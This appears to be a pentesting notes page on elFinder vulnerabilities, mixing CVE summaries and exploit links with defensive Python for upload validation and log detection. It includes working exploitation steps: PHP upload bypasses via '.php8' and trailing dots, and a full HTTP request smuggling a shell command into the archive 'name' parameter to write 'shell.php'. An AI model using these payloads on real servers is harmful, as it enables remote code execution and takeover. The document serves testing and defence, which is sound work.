# ElFinder

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

*elFinder* is an open-source file manager for the web, written in JavaScript using jQuery UI. Ref: <https://github.com/Studio-42/elFinder>

## CVE-2023-52044 - ElFinder 2.1.62 - RCE

Studio-42 elFinder 2.1.62 is vulnerable to Remote Code Execution (RCE) because there is no restriction on uploading files with the `.php8` extension.

1. Select an arbitrary PNG file to upload
2. Capture the request with Burp and set the content to `test<?php phpinfo();?>`
3. Set the filename to something like `test.php8`
4. After forwarding the request, the file is uploaded successfully under the files directory

{% embed url="<https://github.com/advisories/GHSA-jh2f-6jmr-qxf8>" %}

{% embed url="<https://security.snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-8320938>" %}

## CVE-2023-35840 - elFinder < 2.1.62 - Path Traversal

{% embed url="<https://github.com/afine-com/CVE-2023-35840>" %}

## elFinder < 2.6.61 - RCE

{% embed url="<https://security.snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-2615248>" %}

1. Upload a PHP file that contains a payload with a preceding `a`, i.e. `a<?php <payload>?>`.
2. Add two dots after the file name: `shell.php...`
3. The shell file is uploaded successfully, bypassing detection, and can be accessed via `files/shell.php`.
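The two upload bypasses on this page (the `.php8` extension from CVE-2023-52044 and the trailing-dot name from this section) both defeat a check that looks only at the final extension. The Python below is added here as an example and is not code from elFinder: it puts such a naive denylist next to a hardened allowlist check that normalizes trailing dots and inspects every extension segment, plus a content check that does not depend on the file starting with `<?php`. The executable-extension set and the allowlist are assumptions for the example, not values from elFinder's configuration.

```python
"""Upload-name and content checks that catch the two bypasses this page describes:
an alternative PHP extension such as .php8 (CVE-2023-52044) and trailing dots such
as shell.php... (elFinder < 2.6.61 RCE). Added example, not elFinder's own code."""
import posixpath

# Extensions a typical PHP-enabled web server hands to the interpreter.
# Representative set (assumption), not a list taken from elFinder's config.
PHP_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps"}

# What this hypothetical upload endpoint is meant to accept (allowlist, assumption).
ALLOWED = {"png", "jpg", "jpeg", "gif", "txt", "pdf", "zip"}


def naive_denylist_check(filename: str) -> bool:
    """The style of check both bypasses defeat: look only at the last extension
    and reject it if it is exactly 'php'. Returns True when the name is accepted."""
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    return ext != "php"


def normalize_name(filename: str) -> str:
    """Drop any directory part and the trailing dots/spaces that NTFS silently
    removes on write, so 'shell.php...' is judged as 'shell.php'."""
    base = posixpath.basename(filename.replace("\\", "/"))
    return base.rstrip(". ").lower()


def hardened_check(filename: str) -> bool:
    """Accept a name only if every extension segment is allowlisted and none is
    PHP-executable; inner segments matter because Apache's AddHandler can match
    'a.php.jpg'. Returns True when the name is accepted."""
    name = normalize_name(filename)
    if not name or name.startswith("."):
        return False
    segments = name.split(".")
    if len(segments) < 2:
        return False          # no extension at all: nothing to allowlist
    exts = segments[1:]
    if any(e in PHP_EXECUTABLE for e in exts):
        return False
    return all(e in ALLOWED for e in exts)


def looks_like_php(content: bytes) -> bool:
    """Content check that does not rely on the file *starting* with an open tag,
    so a leading byte such as the 'a' in 'a<?php ...' does not hide the payload."""
    return b"<?php" in content.lower() or b"<?=" in content


if __name__ == "__main__":
    for name in ("image.png", "test.php8", "shell.php...", "a.php.jpg", "../etc/passwd"):
        print(f"{name:16} denylist={naive_denylist_check(name)!s:5} hardened={hardened_check(name)}")
```

Running it shows the naive denylist accepting both `test.php8` and `shell.php...` while the hardened check rejects them; the point is to validate after normalization and against an allowlist, and to scan content for an open tag anywhere rather than only at offset zero.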

## CVE-2022-26960 - LFI

elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php.

{% embed url="<https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning>" %}

<figure><img src="/files/5cS6fjUey2SFE7hYstyU" alt=""><figcaption></figcaption></figure>

## CVE-2021-32682 - RCE

{% embed url="<https://www.sonarsource.com/blog/elfinder-case-study-of-web-file-manager-vulnerabilities/>" %}

{% embed url="<https://github.com/vulhub/vulhub/tree/master/elfinder/CVE-2021-32682>" %}

Create a plain text file named `1.txt`

<figure><img src="/files/nyc21c59YXXAg0wM9yVK" alt=""><figcaption></figcaption></figure>

Archive this file via the right-click menu in ZIP format, and rename the resulting archive to `2.zip`:

<figure><img src="/files/R7palZ5z0bEimZSSC3QR" alt=""><figcaption></figcaption></figure>

Both `1.txt` and `2.zip` are now in place:

<figure><img src="/files/XGjPr9m71bY3JS6EgECl" alt=""><figcaption></figcaption></figure>

Then, send the following request to execute arbitrary commands:

```http
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

```

In this request, there are three important parameters:

* `name`: its value is `-TvTT=id>shell.php # a.zip`; the `id>shell.php` part can be replaced with arbitrary commands
* `targets[0]`: its value is `l1_MS50eHQ`, where `l1` means the first storage volume and `MS50eHQ` is the base64-encoded string `1.txt`
* `targets[1]`: its value is `l1_Mi56aXA`, where `l1` means the first storage volume and `Mi56aXA` is the base64-encoded string `2.zip`

Although this request responds with an error message, our command has been executed and `shell.php` has been written to `http://your-ip:8080/files/shell.php`
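To make requests like the one above readable in web-server logs, the Python below, added here as an example and not code from elFinder or vulhub, decodes the `l1_…` target hashes and flags `archive` calls whose `name` would be treated as a command-line option by the archiver. It assumes elFinder's hash layout (volume id, `_`, base64 with `+/=` mapped to `-_.` and trailing `.` trimmed), which is consistent with the values on this page (`l1_Lw` decodes to `/`). The access-log lines are constructed; the second one carries this page's request.

```python
"""Decode elFinder target hashes and flag the archive-command argument injection
(CVE-2021-32682) in web-server access logs. Added example, not elFinder's or
vulhub's code. The hash layout (volume id, '_', base64 with '+/=' mapped to
'-_.' and trailing '.' trimmed) is taken from elFinder's encode() as I know it;
the log lines below are constructed, the second carrying this page's request."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[;&|`$><#]")


def decode_target(hash_: str) -> tuple:
    """'l1_MS50eHQ' -> ('l1', '1.txt'); 'l1_Lw' -> ('l1', '/')."""
    volume, _, enc = hash_.partition("_")
    std = enc.translate(str.maketrans("-_.", "+/="))
    std += "=" * (-len(std) % 4)              # restore the stripped padding
    return volume, base64.b64decode(std).decode("utf-8", "replace")


def inspect_query(query: str) -> dict:
    """Parse a connector query string and decide whether its 'archive' call
    carries a name the archiver would parse as an option or a shell fragment."""
    q = parse_qs(query)
    cmd = q.get("cmd", [""])[0]
    name = q.get("name", [""])[0]
    targets = {k: decode_target(v[0])[1] for k, v in q.items()
               if k == "target" or k.startswith("targets[")}
    reasons = []
    if cmd == "archive":
        if name.startswith("-"):
            reasons.append("archive name begins with '-' (treated as an archiver option)")
        if SHELL_META.search(name):
            reasons.append("shell metacharacters in archive name")
    return {"cmd": cmd, "name": name, "targets": targets, "reasons": reasons}


def scan_access_log(lines) -> list:
    """Return (line number, verdict) for every connector request that looks like the injection."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m or "connector" not in m.group("target"):
            continue
        verdict = inspect_query(urlsplit(m.group("target")).query)
        if verdict["reasons"]:
            hits.append((n, verdict))
    return hits


# Constructed sample log: one benign archive call, then the request shown on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /php/connector.minimal.php?cmd=archive&name=report.zip&target=l1_Lw&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:07 +0000] "GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1" 500 87',
]

if __name__ == "__main__":
    for n, v in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: name={v['name']!r} targets={v['targets']} -> {v['reasons']}")
```

Run it directly to print the flagged line; on a real Apache or nginx log, replace `SAMPLE_LOG` with the file's lines. The error status on its own is not a useful signal, since the page notes that the command runs even though the connector answers with an error, so the rule keys on the `name` value rather than the response code.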

<figure><img src="/files/p6pnZUEi2AJqErWjdFDx" alt=""><figcaption></figcaption></figure>

## CVE-2021-43421 - RCE in elFinder < 2.1.60

{% embed url="<https://github.com/projectdiscovery/nuclei-templates/issues/4090>" %}

{% embed url="<https://github.com/Studio-42/elFinder/issues/3429>" %}

## elFinder 2.1.57 RCE

{% embed url="<https://github.com/Studio-42/elFinder/issues/3295>" %}

## elFinder Web file manager Version: 2.1.53 Remote Command Execution

{% embed url="<https://www.exploit-db.com/exploits/51864>" %}

## CVE-2019-9194 - elFinder <= 2.1.47 - Command Injection

Command injection in the PHP connector.

{% embed url="<https://www.exploit-db.com/exploits/46481>" %}

{% embed url="<https://github.com/hadrian3689/elFinder_2.1.47_php_connector_rce>" %}

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

